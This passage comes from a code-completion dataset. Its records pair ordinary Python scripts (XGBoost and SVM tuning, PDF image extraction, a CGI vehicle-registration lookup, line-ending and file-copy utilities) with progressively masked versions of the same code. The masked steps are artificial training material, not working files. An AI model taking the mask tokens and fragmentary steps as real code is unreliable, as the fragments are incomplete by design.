sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#param_test2()\n\ndef paramTest2a():\n global X_model, Y_model, gkf\n param_grid = {\n #'max_depth': [5, 6, 7],\n #'learning_rate': [0.1, 0.15, 0.2, 0.3],\n #'min_child_weight':[1,3,5,7],\n # 'gamma':[i/10.0 for i in range(0,5)],\n 'subsample': [i / 10.0 for i in range(6, 10)],\n 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(max_depth=5,min_child_weight=2,silent=0,learning_rate=0.1,objective=\"multi:softmax\")\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = 
max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest2a()\n\ndef paramTest2b():\n global X_model, Y_model, gkf\n param_grid = {\n #'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n #'min_child_weight': [1, 3, 5, 7],\n #'gamma':[i/10.0 for i in range(0,5)],\n 'subsample': [i / 10.0 for i in range(6, 10)],\n 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0, objective=\"multi:softmax\",learning_rate=0.1,max_depth=7,min_child_weight=7)\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest2b()\n\ndef paramTest3():\n global X_model, Y_model, gkf\n param_grid = {\n # 'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n # 'min_child_weight': [1, 3, 5, 7],\n 'gamma':[i/10.0 for i in range(0,5)],\n #'subsample': [i / 10.0 for i in range(6, 10)],\n #'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n # 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0,objective=\"multi:softmax\", learning_rate=0.1, max_depth=7, min_child_weight=7,\n colsample_bytree=0.9,subsample=0.9)\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\n#paramTest3()\n\ndef paramTest4a():\n global X_model, Y_model,gkf\n param_grid = {\n # 'max_depth': [5, 6, 7],\n # 'learning_rate': [0.1, 0.15, 0.2, 0.3],\n # 'min_child_weight': [1, 3, 5, 7],\n # 'gamma': [i / 10.0 for i in range(0, 5)],\n # 'subsample': [i / 10.0 for i in range(6, 10)],\n # 'colsample_bytree': [i / 10.0 for i in range(6, 10)],\n 'reg_alpha': [1e-5, 1e-2, 0.1, 1, 100],\n 'n_estimators': [100]}\n xgbclf = xgb.XGBClassifier(silent=0, learning_rate=0.1, max_depth=7, min_child_weight=7,gamma=0.1,\n colsample_bytree=0.8, subsample=0.6,objective=\"multi:softmax\")\n # Run Grid Search process\n gs_clf = GridSearchCV(xgbclf, param_grid,\n n_jobs=1,\n scoring='f1_weighted',cv=gkf)\n gs_clf.fit(np.asarray(X_model), Y_model)\n print gs_clf.grid_scores_, gs_clf.best_params_, gs_clf.best_score_\n best_parameters, score, _ = max(gs_clf.grid_scores_, key=lambda x: x[1])\n print('score:', score)\n for param_name in sorted(best_parameters.keys()):\n print('%s: %r' % (param_name, best_parameters[param_name]))\n\nparamTest4a()\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def func():
print("这是无参数的打印")
func()
def func1(a):
print(f"这是有参数的打印:{a}")
func1("有参数a")
def func2(a, b):
return a + b
print(f"有返回值打印:{func2(3, 2)}")
def func3(a, b):
return
print(f"无返回值打印:{func3(3, 2)}")
|
normal
|
{
"blob_id": "be892250c31198e801836dba24fa8218dd50e811",
"index": 1178,
"step-1": "<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-3": "def func():\n print('这是无参数的打印')\n\n\n<mask token>\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\n<mask token>\n\n\ndef func2(a, b):\n return a + b\n\n\n<mask token>\n\n\ndef func3(a, b):\n return\n\n\n<mask token>\n",
"step-4": "def func():\n print('这是无参数的打印')\n\n\nfunc()\n\n\ndef func1(a):\n print(f'这是有参数的打印:{a}')\n\n\nfunc1('有参数a')\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f'有返回值打印:{func2(3, 2)}')\n\n\ndef func3(a, b):\n return\n\n\nprint(f'无返回值打印:{func3(3, 2)}')\n",
"step-5": "def func():\n print(\"这是无参数的打印\")\n\n\nfunc()\n\n\ndef func1(a):\n print(f\"这是有参数的打印:{a}\")\n\n\nfunc1(\"有参数a\")\n\n\ndef func2(a, b):\n return a + b\n\n\nprint(f\"有返回值打印:{func2(3, 2)}\")\n\n\ndef func3(a, b):\n return\n\n\nprint(f\"无返回值打印:{func3(3, 2)}\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
<|reserved_special_token_0|>
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
<|reserved_special_token_0|>
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref
[0] in [10, 25, 26]])
maximum_digits = len(str(len(xrefs) * 3))
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = 'image--{}.jpg'.format(index)
img_path = join(dest_path, img_name)
if not exists(img_path):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
import requests
from os.path import join, exists
import os
import fitz
from tqdm import tqdm
from pathlib import Path
import tempfile
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref
[0] in [10, 25, 26]])
maximum_digits = len(str(len(xrefs) * 3))
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = 'image--{}.jpg'.format(index)
img_path = join(dest_path, img_name)
if not exists(img_path):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
import requests
from os.path import join, exists
import os
import fitz
from tqdm import tqdm
from pathlib import Path
import tempfile
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + ".pdf")
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not(xref[0] in [10, 25, 26])])
maximum_digits = len(str(len(xrefs)*3))
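    # Output images are named image--<index>.jpg with a zero-padded index that advances by 3 per image (1, 4, 7, ...).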
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = "image--{}.jpg".format(index)
img_path = join(dest_path, img_name)
if not(exists(img_path)):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
|
flexible
|
{
"blob_id": "c6113088f45951bc4c787760b6ca0138265fb83f",
"index": 9966,
"step-1": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\n<mask token>\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-2": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\n<mask token>\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-3": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref\n [0] in [10, 25, 26]])\n maximum_digits = len(str(len(xrefs) * 3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = 'image--{}.jpg'.format(index)\n img_path = join(dest_path, img_name)\n if not exists(img_path):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-4": "import requests\nfrom os.path import join, exists\nimport os\nimport fitz\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport tempfile\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref\n [0] in [10, 25, 26]])\n maximum_digits = len(str(len(xrefs) * 3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = 'image--{}.jpg'.format(index)\n img_path = join(dest_path, img_name)\n if not exists(img_path):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-5": "import requests\nfrom os.path import join, exists\nimport os\nimport fitz\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport tempfile\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + \".pdf\")\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not(xref[0] in [10, 25, 26])])\n maximum_digits = len(str(len(xrefs)*3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = \"image--{}.jpg\".format(index)\n img_path = join(dest_path, img_name)\n if not(exists(img_path)):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
n = int(input())
s = ""
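# For each test case: square the three sides, sort them, and apply the Pythagorean check (a^2 + b^2 == c^2).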
for i in range(n):
l = list(map(lambda x:x*x,map(int, input().split())))
l.sort()
if l[0] + l[1] == l[2]:
s += "YES\n"
else:
s += "NO\n"
print(s,end="")
|
normal
|
{
"blob_id": "f8b473451a15e42319b60f44a527d715c0032614",
"index": 3411,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n l = list(map(lambda x: x * x, map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += 'YES\\n'\n else:\n s += 'NO\\n'\nprint(s, end='')\n",
"step-3": "n = int(input())\ns = ''\nfor i in range(n):\n l = list(map(lambda x: x * x, map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += 'YES\\n'\n else:\n s += 'NO\\n'\nprint(s, end='')\n",
"step-4": "n = int(input())\ns = \"\"\nfor i in range(n):\n l = list(map(lambda x:x*x,map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += \"YES\\n\"\n else:\n s += \"NO\\n\"\n\nprint(s,end=\"\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import sys
from sklearn.svm import SVC
from sklearn.model_selection import KFold,cross_validate,GridSearchCV
from data_prepr import data_preprocessing
import numpy as np
def main():
#if dataset is not provided on call terminate
if len(sys.argv)<2:
print("usage: python svm_parameter_tuning.py <input_file> ")
sys.exit()
#pass dataset and get the matrix containing the data vectors and data targets
ret_value=data_preprocessing(sys.argv[1])
data_matrix=ret_value[0]
category_labels=ret_value[1]
#create k_fold iterator to calculate metrics
k_fold = KFold(n_splits=10)
#perform grid search to determine parameter tuning
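	#C and gamma are searched on log-scale grids of powers of 2: C in 2^-5..2^9, gamma in 2^-10..2^-6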
c_range = [np.power(2.0,i) for i in range(-5, 10)]
gamma_range = [np.power(2.0,i) for i in range(-10, -5)]
param_grid = [{'kernel': ['rbf'], 'gamma': gamma_range,'C':c_range},{'kernel': ['linear'], 'C': c_range}]
clf = GridSearchCV(SVC(),param_grid,cv=k_fold,scoring='accuracy',n_jobs=-1)
clf.fit(data_matrix,category_labels)
#print chosen hyperparameters
	print("Best accuracy achieved: " + str(clf.best_score_) + " with below settings.")
	for key,value in clf.best_params_.items():
		print(key + ":" + str(value))
#save best hyperparameter values on a dictionary in file hyperparameter_values.py
output=open('./hyperparameter_values.py','w')
output.write('HYPERPARAMETER_VALUES={')
first=True
	for key,value in clf.best_params_.items():
if first==True:
output.write("\'"+key+"\':")
first=False
else:
output.write(",\'"+key+"\':")
if isinstance(value,str):
output.write("\'"+value+"\'")
else:
output.write(str(value))
output.write('}')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "c5842b17b2587149cd13448593a6ed31b091ba77",
"index": 4971,
"step-1": "import sys\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import KFold,cross_validate,GridSearchCV\nfrom data_prepr import data_preprocessing\nimport numpy as np\n\n\ndef main():\n\t#if dataset is not provided on call terminate\n\tif len(sys.argv)<2:\n\t\tprint(\"usage: python svm_parameter_tuning.py <input_file> \")\n\t\tsys.exit()\n\n\t#pass dataset and get the matrix containing the data vectors and data targets\n\tret_value=data_preprocessing(sys.argv[1])\n\tdata_matrix=ret_value[0]\n\tcategory_labels=ret_value[1]\n\n\t#create k_fold iterator to calculate metrics\n\tk_fold = KFold(n_splits=10)\n\n\t#perform grid search to determine parameter tuning\n\tc_range = [np.power(2.0,i) for i in range(-5, 10)]\n\tgamma_range = [np.power(2.0,i) for i in range(-10, -5)]\n\tparam_grid = [{'kernel': ['rbf'], 'gamma': gamma_range,'C':c_range},{'kernel': ['linear'], 'C': c_range}]\n\tclf = GridSearchCV(SVC(),param_grid,cv=k_fold,scoring='accuracy',n_jobs=-1)\n\tclf.fit(data_matrix,category_labels)\n\n\t#print chosen hyperparameters\n\tprint \"Best accuracy achieved:\"+ str(clf.best_score_) + \" with below settings.\"\n\tfor key,value in clf.best_params_.iteritems():\n\t\tprint key + \":\" + str(value)\n\t#save best hyperparameter values on a dictionary in file hyperparameter_values.py\n\toutput=open('./hyperparameter_values.py','w')\n\toutput.write('HYPERPARAMETER_VALUES={')\n\tfirst=True\n\tfor key,value in clf.best_params_.iteritems():\n\t\tif first==True:\n\t\t\toutput.write(\"\\'\"+key+\"\\':\")\n\t\t\tfirst=False\n\t\telse:\n\t\t\toutput.write(\",\\'\"+key+\"\\':\")\n\n\t\tif isinstance(value,str):\n\t\t\toutput.write(\"\\'\"+value+\"\\'\")\n\t\telse:\n\t\t\toutput.write(str(value))\n\toutput.write('}')\n\n\n\nif __name__ == '__main__':\n\tmain()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#! /usr/bin/python3
print("content-type: text/html")
print()
import cgi
import subprocess as sp
import requests
import xmltodict
import json
db = cgi.FieldStorage()
ch=db.getvalue("ch")
url =("http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>" .format(ch))
url=url.replace(" ","%20")
r = requests.get(url)
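# The API responds with XML; convert it to a dict, then parse the embedded vehicleJson string for the vehicle details.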
n = xmltodict.parse(r.content)
k = json.dumps(n)
df = json.loads(k)
l=df["Vehicle"]["vehicleJson"]
p=json.loads(l)
output="Your car's details are:\n"+"Owner name: "+str(p['Owner'])+"\n"+"Car Company: "+str(p['CarMake']['CurrentTextValue'])+"\n"+"Car Model: "+str(p['CarModel']['CurrentTextValue'])+"\n"+"Fuel Type: "+str(p['FuelType']['CurrentTextValue'])+"\n"+"Registration Year: "+str(p['RegistrationYear'])+"\n"+"Insurance: "+str(p['Insurance'])+"\n"+"Vehicle ID: "+str(p['VechileIdentificationNumber'])+"\n"+"Engine No.: "+str(p['EngineNumber'])+"\n"+"Location RTO: "+str(p['Location'])
print(output)
|
normal
|
{
"blob_id": "87a62f76027e0653f6966f76a42def2ce2a26ba3",
"index": 5893,
"step-1": "<mask token>\n",
"step-2": "print('content-type: text/html')\nprint()\n<mask token>\nprint(output)\n",
"step-3": "print('content-type: text/html')\nprint()\n<mask token>\ndb = cgi.FieldStorage()\nch = db.getvalue('ch')\nurl = (\n 'http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>'\n .format(ch))\nurl = url.replace(' ', '%20')\nr = requests.get(url)\nn = xmltodict.parse(r.content)\nk = json.dumps(n)\ndf = json.loads(k)\nl = df['Vehicle']['vehicleJson']\np = json.loads(l)\noutput = \"Your car's details are:\\n\" + 'Owner name: ' + str(p['Owner']\n ) + '\\n' + 'Car Company: ' + str(p['CarMake']['CurrentTextValue']\n ) + '\\n' + 'Car Model: ' + str(p['CarModel']['CurrentTextValue']\n ) + '\\n' + 'Fuel Type: ' + str(p['FuelType']['CurrentTextValue']\n ) + '\\n' + 'Registration Year: ' + str(p['RegistrationYear']\n ) + '\\n' + 'Insurance: ' + str(p['Insurance']\n ) + '\\n' + 'Vehicle ID: ' + str(p['VechileIdentificationNumber']\n ) + '\\n' + 'Engine No.: ' + str(p['EngineNumber']\n ) + '\\n' + 'Location RTO: ' + str(p['Location'])\nprint(output)\n",
"step-4": "print('content-type: text/html')\nprint()\nimport cgi\nimport subprocess as sp\nimport requests\nimport xmltodict\nimport json\ndb = cgi.FieldStorage()\nch = db.getvalue('ch')\nurl = (\n 'http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>'\n .format(ch))\nurl = url.replace(' ', '%20')\nr = requests.get(url)\nn = xmltodict.parse(r.content)\nk = json.dumps(n)\ndf = json.loads(k)\nl = df['Vehicle']['vehicleJson']\np = json.loads(l)\noutput = \"Your car's details are:\\n\" + 'Owner name: ' + str(p['Owner']\n ) + '\\n' + 'Car Company: ' + str(p['CarMake']['CurrentTextValue']\n ) + '\\n' + 'Car Model: ' + str(p['CarModel']['CurrentTextValue']\n ) + '\\n' + 'Fuel Type: ' + str(p['FuelType']['CurrentTextValue']\n ) + '\\n' + 'Registration Year: ' + str(p['RegistrationYear']\n ) + '\\n' + 'Insurance: ' + str(p['Insurance']\n ) + '\\n' + 'Vehicle ID: ' + str(p['VechileIdentificationNumber']\n ) + '\\n' + 'Engine No.: ' + str(p['EngineNumber']\n ) + '\\n' + 'Location RTO: ' + str(p['Location'])\nprint(output)\n",
"step-5": "#! /usr/bin/python3\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\n\r\nimport cgi\r\nimport subprocess as sp\r\nimport requests\r\nimport xmltodict\r\nimport json\r\n\r\ndb = cgi.FieldStorage()\r\nch=db.getvalue(\"ch\")\r\nurl =(\"http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>\" .format(ch))\r\nurl=url.replace(\" \",\"%20\")\r\nr = requests.get(url)\r\nn = xmltodict.parse(r.content)\r\nk = json.dumps(n)\r\ndf = json.loads(k)\r\nl=df[\"Vehicle\"][\"vehicleJson\"]\r\np=json.loads(l)\r\noutput=\"Your car's details are:\\n\"+\"Owner name: \"+str(p['Owner'])+\"\\n\"+\"Car Company: \"+str(p['CarMake']['CurrentTextValue'])+\"\\n\"+\"Car Model: \"+str(p['CarModel']['CurrentTextValue'])+\"\\n\"+\"Fuel Type: \"+str(p['FuelType']['CurrentTextValue'])+\"\\n\"+\"Registration Year: \"+str(p['RegistrationYear'])+\"\\n\"+\"Insurance: \"+str(p['Insurance'])+\"\\n\"+\"Vehicle ID: \"+str(p['VechileIdentificationNumber'])+\"\\n\"+\"Engine No.: \"+str(p['EngineNumber'])+\"\\n\"+\"Location RTO: \"+str(p['Location'])\r\nprint(output)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
<|reserved_special_token_0|>
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
<|reserved_special_token_0|>
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
<|reserved_special_token_0|>
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ''
if sys.platform == 'win32':
if force:
flags += ' /Y'
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else:
if force:
flags += ' --force'
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
if source == dest:
return dest
